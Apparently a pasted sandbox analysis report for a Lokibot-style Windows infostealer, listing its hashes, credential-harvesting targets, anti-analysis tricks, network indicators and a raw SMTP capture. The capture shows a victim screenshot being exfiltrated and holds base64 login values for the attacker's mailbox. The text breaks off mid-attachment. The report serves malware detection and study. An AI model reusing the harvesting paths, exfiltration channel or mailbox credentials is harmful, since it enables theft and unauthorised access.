paladin316

Exes_37e318ad4c77cca37d44c43107cf9566_exe_2019-06-27_09_30.json

Jun 27th, 2019
1,474
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 264.87 KB | None | 0 0
  1.  
  2. [*] MalFamily: ""
  3.  
  4. [*] MalScore: 10.0
  5.  
  6. [*] File Name: "Exes_37e318ad4c77cca37d44c43107cf9566.exe"
  7. [*] File Size: 788480
  8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. [*] SHA256: "f9afc8a055c47c8d16233d9e865e68509364f674f0fe448e38578cbad786b2c8"
  10. [*] MD5: "37e318ad4c77cca37d44c43107cf9566"
  11. [*] SHA1: "a38538e5a3f8701683b5a9dedc507e8ca40089dd"
  12. [*] SHA512: "6509d24abf775b46df8619db743330e55c061a78538c1adf8d93af439bac5efc16af969c59503f7d832972c31fb8e8ba0bb8210f6ea22aae10a2fdcf72dff2f4"
  13. [*] CRC32: "A5A5F7F1"
  14. [*] SSDEEP: "12288:c0f1JN1W7i2ku4Na0L4CIzxL5zrlwjZ12onM7KyA5Y5jq3W:ce/N1oku4/cZbzeVpwKyAW5j1"
  15.  
  16. [*] Process Execution: [
  17. "Exes_37e318ad4c77cca37d44c43107cf9566.exe",
  18. "frankjhn.exe",
  19. "frankjhn.exe",
  20. "services.exe",
  21. "svchost.exe",
  22. "WmiPrvSE.exe",
  23. "WmiPrvSE.exe",
  24. "svchost.exe",
  25. "WMIADAP.exe",
  26. "lsass.exe",
  27. "sc.exe",
  28. "svchost.exe"
  29. ]
  30.  
  31. [*] Signatures Detected: [
  32. {
  33. "Description": "Creates RWX memory",
  34. "Details": []
  35. },
  36. {
  37. "Description": "A process created a hidden window",
  38. "Details": [
  39. {
  40. "Process": "svchost.exe -> \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE"
  41. }
  42. ]
  43. },
  44. {
  45. "Description": "Drops a binary and executes it",
  46. "Details": [
  47. {
  48. "binary": "C:\\Users\\user\\AppData\\Roaming\\frankjoh\\frankjhn.exe"
  49. }
  50. ]
  51. },
  52. {
  53. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  54. "Details": [
  55. {
  56. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  57. },
  58. {
  59. "suspicious_request": "http://checkip.amazonaws.com/"
  60. }
  61. ]
  62. },
  63. {
  64. "Description": "Performs some HTTP requests",
  65. "Details": [
  66. {
  67. "url": "http://checkip.amazonaws.com/"
  68. }
  69. ]
  70. },
  71. {
  72. "Description": "The binary likely contains encrypted or compressed data.",
  73. "Details": [
  74. {
  75. "section": "name: .rsrc, entropy: 7.38, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ, raw_size: 0x00042200, virtual_size: 0x00042144"
  76. }
  77. ]
  78. },
  79. {
  80. "Description": "Executed a process and injected code into it, probably while unpacking",
  81. "Details": [
  82. {
  83. "Injection": "frankjhn.exe(2256) -> frankjhn.exe(2672)"
  84. }
  85. ]
  86. },
  87. {
  88. "Description": "Sniffs keystrokes",
  89. "Details": [
  90. {
  91. "SetWindowsHookExW": "Process: frankjhn.exe(2672)"
  92. }
  93. ]
  94. },
  95. {
  96. "Description": "Attempts to restart the guest VM",
  97. "Details": []
  98. },
  99. {
  100. "Description": "A process attempted to delay the analysis task by a long amount of time.",
  101. "Details": [
  102. {
  103. "Process": "WmiPrvSE.exe tried to sleep 607 seconds, actually delayed analysis time by 0 seconds"
  104. },
  105. {
  106. "Process": "frankjhn.exe tried to sleep 2508 seconds, actually delayed analysis time by 0 seconds"
  107. }
  108. ]
  109. },
  110. {
  111. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  112. "Details": [
  113. {
  114. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 10453946 times"
  115. }
  116. ]
  117. },
  118. {
  119. "Description": "Steals private information from local Internet browsers",
  120. "Details": [
  121. {
  122. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  123. }
  124. ]
  125. },
  126. {
  127. "Description": "Retrieves Windows ProductID, probably to fingerprint the sandbox",
  128. "Details": []
  129. },
  130. {
  131. "Description": "File has been identified by 32 Antiviruses on VirusTotal as malicious",
  132. "Details": [
  133. {
  134. "MicroWorld-eScan": "Trojan.Delf.QGU"
  135. },
  136. {
  137. "FireEye": "Generic.mg.37e318ad4c77cca3"
  138. },
  139. {
  140. "BitDefender": "Trojan.Delf.QGU"
  141. },
  142. {
  143. "Cybereason": "malicious.5a3f87"
  144. },
  145. {
  146. "Invincea": "heuristic"
  147. },
  148. {
  149. "F-Prot": "W32/Injector.HZU"
  150. },
  151. {
  152. "Symantec": "Infostealer.Lokibot!16"
  153. },
  154. {
  155. "APEX": "Malicious"
  156. },
  157. {
  158. "Kaspersky": "HEUR:Trojan.Win32.Crypt.gen"
  159. },
  160. {
  161. "Rising": "Trojan.Injector!1.AFE3 (CLASSIC)"
  162. },
  163. {
  164. "Endgame": "malicious (high confidence)"
  165. },
  166. {
  167. "TrendMicro": "TSPY_HPFAREIT.SMROX"
  168. },
  169. {
  170. "McAfee-GW-Edition": "BehavesLike.Win32.Fareit.bc"
  171. },
  172. {
  173. "Fortinet": "W32/GenKryptik.DHVS!tr"
  174. },
  175. {
  176. "Emsisoft": "Trojan.Delf.QGU (B)"
  177. },
  178. {
  179. "Cyren": "W32/Injector.PGFJ-1667"
  180. },
  181. {
  182. "MAX": "malware (ai score=81)"
  183. },
  184. {
  185. "Arcabit": "Trojan.Delf.QGU"
  186. },
  187. {
  188. "ZoneAlarm": "HEUR:Trojan.Win32.Crypt.gen"
  189. },
  190. {
  191. "Microsoft": "Trojan:Win32/Wacatac.B!ml"
  192. },
  193. {
  194. "AhnLab-V3": "Win-Trojan/Delphiless.Exp"
  195. },
  196. {
  197. "Acronis": "suspicious"
  198. },
  199. {
  200. "Ad-Aware": "Trojan.Delf.QGU"
  201. },
  202. {
  203. "Cylance": "Unsafe"
  204. },
  205. {
  206. "ESET-NOD32": "a variant of Win32/Injector.EGHC"
  207. },
  208. {
  209. "TrendMicro-HouseCall": "TSPY_HPFAREIT.SMROX"
  210. },
  211. {
  212. "SentinelOne": "DFI - Suspicious PE"
  213. },
  214. {
  215. "GData": "Trojan.Delf.QGU"
  216. },
  217. {
  218. "AVG": "Win32:Trojan-gen"
  219. },
  220. {
  221. "Avast": "Win32:Trojan-gen"
  222. },
  223. {
  224. "CrowdStrike": "win/malicious_confidence_100% (W)"
  225. },
  226. {
  227. "Qihoo-360": "HEUR/QVM05.1.2401.Malware.Gen"
  228. }
  229. ]
  230. },
  231. {
  232. "Description": "Checks the version of Bios, possibly for anti-virtualization",
  233. "Details": []
  234. },
  235. {
  236. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  237. "Details": []
  238. },
  239. {
  240. "Description": "Creates a copy of itself",
  241. "Details": [
  242. {
  243. "copy": "C:\\Users\\user\\AppData\\Roaming\\frankjoh\\frankjhn.exe"
  244. }
  245. ]
  246. },
  247. {
  248. "Description": "Harvests credentials from local FTP client softwares",
  249. "Details": [
  250. {
  251. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  252. },
  253. {
  254. "file": "C:\\Users\\user\\AppData\\Roaming\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect\\"
  255. },
  256. {
  257. "file": "C:\\Users\\user\\AppData\\Roaming\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect\\*.xml"
  258. },
  259. {
  260. "file": "C:\\Users\\user\\AppData\\Roaming\\Ipswitch\\WS_FTP\\Sites\\ws_ftp.ini"
  261. },
  262. {
  263. "file": "C:\\cftp\\Ftplist.txt"
  264. },
  265. {
  266. "key": "HKEY_CURRENT_USER\\Software\\FTPWare\\COREFTP\\Sites"
  267. }
  268. ]
  269. },
  270. {
  271. "Description": "Harvests information related to installed mail clients",
  272. "Details": [
  273. {
  274. "file": "C:\\Users\\user\\AppData\\Roaming\\Thunderbird\\profiles.ini"
  275. },
  276. {
  277. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676"
  278. },
  279. {
  280. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  281. },
  282. {
  283. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP Password"
  284. },
  285. {
  286. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
  287. },
  288. {
  289. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\HTTP Password"
  290. },
  291. {
  292. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  293. },
  294. {
  295. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\HTTP Password"
  296. },
  297. {
  298. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  299. },
  300. {
  301. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 Password"
  302. },
  303. {
  304. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
  305. },
  306. {
  307. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP Password"
  308. },
  309. {
  310. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\IMAP Password"
  311. },
  312. {
  313. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  314. },
  315. {
  316. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\IMAP Password"
  317. },
  318. {
  319. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 Password"
  320. },
  321. {
  322. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  323. }
  324. ]
  325. },
  326. {
  327. "Description": "Makes SMTP requests, possibly sending spam or exfiltrating data.",
  328. "Details": [
  329. {
  330. "SMTP": "185.151.28.68 (mail.engineroom.top)"
  331. }
  332. ]
  333. },
  334. {
  335. "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
  336. "Details": [
  337. {
  338. "file": "C:\\Users\\user\\AppData\\Roaming\\frankjoh\\frankjhn.exe:ZoneIdentifier"
  339. }
  340. ]
  341. },
  342. {
  343. "Description": "Collects information to fingerprint the system",
  344. "Details": []
  345. },
  346. {
  347. "Description": "Anomalous binary characteristics",
  348. "Details": [
  349. {
  350. "anomaly": "Timestamp on binary predates the release date of the OS version it requires by at least a year"
  351. }
  352. ]
  353. },
  354. {
  355. "Description": "Created network traffic indicative of malicious activity",
  356. "Details": [
  357. {
  358. "signature": "ET DNS Query to a *.top domain - Likely Hostile"
  359. }
  360. ]
  361. }
  362. ]
  363.  
  364. [*] Started Service: [
  365. "VaultSvc",
  366. "W32Time"
  367. ]
  368.  
  369. [*] Executed Commands: [
  370. "\"C:\\Users\\user\\AppData\\Roaming\\frankjoh\\frankjhn.exe\"",
  371. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
  372. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding",
  373. "\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE wmiadap.exe /F /T /R",
  374. "C:\\Windows\\system32\\lsass.exe",
  375. "C:\\Windows\\system32\\sc.exe start w32time task_started",
  376. "C:\\Windows\\system32\\svchost.exe -k LocalService"
  377. ]
  378.  
  379. [*] Mutexes: [
  380. "Global\\CLR_CASOFF_MUTEX",
  381. "Local\\_!MSFTHISTORY!_",
  382. "Local\\c:!users!user!appdata!local!microsoft!windows!temporary internet files!content.ie5!",
  383. "Local\\c:!users!user!appdata!roaming!microsoft!windows!cookies!",
  384. "Local\\c:!users!user!appdata!local!microsoft!windows!history!history.ie5!",
  385. "Global\\.net clr networking",
  386. "Global\\ADAP_WMI_ENTRY",
  387. "Global\\RefreshRA_Mutex",
  388. "Global\\RefreshRA_Mutex_Lib",
  389. "Global\\RefreshRA_Mutex_Flag"
  390. ]
  391.  
  392. [*] Modified Files: [
  393. "C:\\Users\\user\\AppData\\Roaming\\frankjoh\\frankjhn.exe",
  394. "C:\\Users\\user\\AppData\\Roaming\\frankjoh\\frankjhn.exe:ZoneIdentifier",
  395. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat",
  396. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat",
  397. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat",
  398. "C:\\Users\\user\\AppData\\Roaming\\EFT52aII3F.jpeg",
  399. "C:\\Users\\user\\AppData\\Roaming\\Vi15DFykX2.jpeg",
  400. "C:\\Users\\user\\AppData\\Roaming\\JkHuF8HIU2.jpeg",
  401. "C:\\Users\\user\\AppData\\Roaming\\Cg4aBy416f.jpeg",
  402. "C:\\Users\\user\\AppData\\Roaming\\BIhhXqPs7U.jpeg",
  403. "C:\\Users\\user\\AppData\\Roaming\\Ygs24DS509.jpeg",
  404. "C:\\Users\\user\\AppData\\Roaming\\YeC4IsL8p6.jpeg",
  405. "C:\\Users\\user\\AppData\\Roaming\\Q0vUXbq7K3.jpeg",
  406. "C:\\Users\\user\\AppData\\Roaming\\EgyT6wyJF7.jpeg",
  407. "C:\\Users\\user\\AppData\\Roaming\\JH52BSl2af.jpeg",
  408. "\\??\\PIPE\\samr",
  409. "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
  410. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
  411. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
  412. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
  413. "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
  414. "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
  415. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
  416. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  417. "\\??\\WMIDataDevice",
  418. "\\??\\PIPE\\wkssvc",
  419. "\\??\\PIPE\\srvsvc",
  420. "\\??\\PHYSICALDRIVE0",
  421. "\\??\\CDROM0",
  422. "\\??\\PIPE\\lsarpc",
  423. "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
  424. "C:\\Windows\\sysnative\\wbem\\Performance\\WmiApRpl_new.h"
  425. ]
  426.  
  427. [*] Deleted Files: [
  428. "C:\\Users\\user\\AppData\\Roaming\\frankjoh\\frankjhn.exe",
  429. "C:\\Users\\user\\AppData\\Roaming\\EFT52aII3F.jpeg",
  430. "C:\\Users\\user\\AppData\\Roaming\\Vi15DFykX2.jpeg",
  431. "C:\\Users\\user\\AppData\\Roaming\\JkHuF8HIU2.jpeg",
  432. "C:\\Users\\user\\AppData\\Roaming\\Cg4aBy416f.jpeg",
  433. "C:\\Users\\user\\AppData\\Roaming\\BIhhXqPs7U.jpeg",
  434. "C:\\Users\\user\\AppData\\Roaming\\Ygs24DS509.jpeg",
  435. "C:\\Users\\user\\AppData\\Roaming\\YeC4IsL8p6.jpeg",
  436. "C:\\Users\\user\\AppData\\Roaming\\Q0vUXbq7K3.jpeg",
  437. "C:\\Users\\user\\AppData\\Roaming\\EgyT6wyJF7.jpeg",
  438. "C:\\Users\\user\\AppData\\Roaming\\JH52BSl2af.jpeg"
  439. ]
  440.  
  441. [*] Modified Registry Keys: [
  442. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\frankjhn_RASAPI32",
  443. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\frankjhn_RASAPI32\\EnableFileTracing",
  444. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\frankjhn_RASAPI32\\EnableConsoleTracing",
  445. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\frankjhn_RASAPI32\\FileTracingMask",
  446. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\frankjhn_RASAPI32\\ConsoleTracingMask",
  447. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\frankjhn_RASAPI32\\MaxFileSize",
  448. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\frankjhn_RASAPI32\\FileDirectory",
  449. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
  450. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
  451. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
  452. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
  453. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
  454. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
  455. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
  456. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider",
  457. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
  458. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
  459. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\IDE\\DiskVBOX_HARDDISK___________________________1.0_____\\5&33d1638a&0&0.0.0_0-{00000000-0000-0000-0000-000000000000}",
  460. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\advapi32.dll[MofResourceName]",
  461. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\en-US\\advapi32.dll.mui[MofResourceName]",
  462. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\ACPI.sys[ACPIMOFResource]",
  463. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\en-US\\ACPI.sys.mui[ACPIMOFResource]",
  464. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\ndis.sys[MofResourceName]",
  465. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\en-US\\ndis.sys.mui[MofResourceName]",
  466. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\mssmbios.sys[MofResource]",
  467. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\mssmbios.sys.mui[MofResource]",
  468. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\HDAudBus.sys[HDAudioMofName]",
  469. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\HDAudBus.sys.mui[HDAudioMofName]",
  470. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\intelppm.sys[PROCESSORWMI]",
  471. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\intelppm.sys.mui[PROCESSORWMI]",
  472. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\System32\\Drivers\\portcls.SYS[PortclsMof]",
  473. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\System32\\Drivers\\en-US\\portcls.SYS.mui[PortclsMof]",
  474. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\monitor.sys[MonitorWMI]"
  475. ]
  476.  
  477. [*] Deleted Registry Keys: [
  478. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\monitor.sys[MonitorWMI]"
  479. ]
  480.  
  481. [*] DNS Communications: [
  482. {
  483. "type": "A",
  484. "request": "checkip.amazonaws.com",
  485. "answers": [
  486. {
  487. "data": "52.206.161.133",
  488. "type": "A"
  489. },
  490. {
  491. "data": "52.200.125.74",
  492. "type": "A"
  493. },
  494. {
  495. "data": "checkip.check-ip.aws.a2z.com",
  496. "type": "CNAME"
  497. },
  498. {
  499. "data": "52.6.79.229",
  500. "type": "A"
  501. },
  502. {
  503. "data": "checkip.us-east-1.prod.check-ip.aws.a2z.com",
  504. "type": "CNAME"
  505. },
  506. {
  507. "data": "34.233.102.38",
  508. "type": "A"
  509. },
  510. {
  511. "data": "52.202.139.131",
  512. "type": "A"
  513. },
  514. {
  515. "data": "18.211.215.84",
  516. "type": "A"
  517. }
  518. ]
  519. },
  520. {
  521. "type": "A",
  522. "request": "mail.engineroom.top",
  523. "answers": [
  524. {
  525. "data": "185.151.28.68",
  526. "type": "A"
  527. },
  528. {
  529. "data": "mail.stackmail.com",
  530. "type": "CNAME"
  531. }
  532. ]
  533. }
  534. ]
  535.  
  536. [*] Domains: [
  537. {
  538. "ip": "185.151.28.68",
  539. "domain": "mail.engineroom.top"
  540. },
  541. {
  542. "ip": "52.202.139.131",
  543. "domain": "checkip.amazonaws.com"
  544. }
  545. ]
  546.  
  547. [*] Network Communication - ICMP: []
  548.  
  549. [*] Network Communication - HTTP: [
  550. {
  551. "count": 1,
  552. "body": "",
  553. "uri": "http://checkip.amazonaws.com/",
  554. "user-agent": "",
  555. "method": "GET",
  556. "host": "checkip.amazonaws.com",
  557. "version": "1.1",
  558. "path": "/",
  559. "data": "GET / HTTP/1.1\r\nHost: checkip.amazonaws.com\r\nConnection: Keep-Alive\r\n\r\n",
  560. "port": 80
  561. }
  562. ]
  563.  
  564. [*] Network Communication - SMTP: [
  565. {
  566. "raw": "EHLO Host\r\nAUTH login ZnJhbmtsb2dzQGVuZ2luZXJvb20udG9w\r\nNTY2MjIwNWFjZUFDRQ==\r\nMAIL FROM:<franklogs@engineroom.top>\r\nEHLO Host\r\nAUTH login ZnJhbmtsb2dzQGVuZ2luZXJvb20udG9w\r\nNTY2MjIwNWFjZUFDRQ==\r\nNTY2MjIwNWFjZUFDRQ==\r\nEHLO Host\r\nAUTH login ZnJhbmtsb2dzQGVuZ2luZXJvb20udG9w\r\nNTY2MjIwNWFjZUFDRQ==\r\nMAIL FROM:<franklogs@engineroom.top>\r\nRCPT TO:<frankjoe@engineroom.top>\r\nDATA\r\nMIME-Version: 1.0\r\nFrom: franklogs@engineroom.top\r\nTo: frankjoe@engineroom.top\r\nDate: 27 Jun 2019 03:59:05 -0700\r\nSubject: user/Host Screen Capture\r\nContent-Type: multipart/mixed; boundary=--boundary_0_d7300d3d-55c6-468e-9c15-7cf6a941a8d6\r\n\r\n\r\n----boundary_0_d7300d3d-55c6-468e-9c15-7cf6a941a8d6\r\nContent-Type: text/html; charset=us-ascii\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\nTime: 06/27/2019 03:42:49<br>UserName: user<br>ComputerName: Host<br>OSFullName:=\r\n Win32NT<br>CPU: Unknown<br>RAM: 4095.55 MB<br>IP: 0.0.0.0=0A<hr>\r\n----boundary_0_d7300d3d-55c6-468e-9c15-7cf6a941a8d6\r\nContent-Type: application/octet-stream; name=Vi15DFykX2.jpeg\r\nContent-Transfer-Encoding: base64\r\n\r\n/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9\r\nPDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhC\r\nY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wAAR\r\nCAPCB4ADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAA\r\nAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkK\r\nFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWG\r\nh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl\r\n5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREA\r\nAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYk\r\nNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOE\r\nhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk\r\n5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDz+iiigAorX8OabBqd1JFKcuq7kQttDeuT\r\nXU/8I5JAv7vRLdx679/8zTSE2ef0V3E2myovz6NBGPXyQP51Qayh34aK3U+h2CnyhzHLUV15\r\n0GxktJZpxHbqqlvMST29OhrkKkYUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUV0Hg2wi1DVh\r\nHMOAR/Ik/wAqUnZXNKcOeVr2/wCBqc/RXtH/AAj+mf8APt/5Eb/Gj+wNM/59v/Ijf41N5dvx\r\n/wCAXy0f5n9y/wDkjxeivZJ/DemzQsiwmMnuGJ/Q5rzTxDoM+kXTAqTF1BHp/hRzNOzB0otX\r\npu9vK36sxqKKKswCiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo\r\noAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC\r\niiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo\r\noAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC\r\niiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo\r\noAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC\r\niiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo\r\noAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC\r\niiigAooooA1vDE3la5b56PlfzFb2p3EkNyNkrp/usRXJ6fL5F/by5xtkB/Wu1v5reAhZlXdI\r\n3GQOR61pTV3YiehlNezuMNPIw9C5NSWb7pGye1Ub0xxTkRsCDzgdqfYzKpdmYBQOSaqWjsSt\r\ndR2sv+4kJPOMVzlaurStJHvOVVjhVPXHqayqyZogooopDCvQvh9Z6dLoNzPf21q+252+ZPGp\r\nwNq4GT7n9a89rtvDoB+H2qAgEfaRwTj/AJ50m7K5UFzSSJrzWLRL+aO00fSmgQlVL2o3Z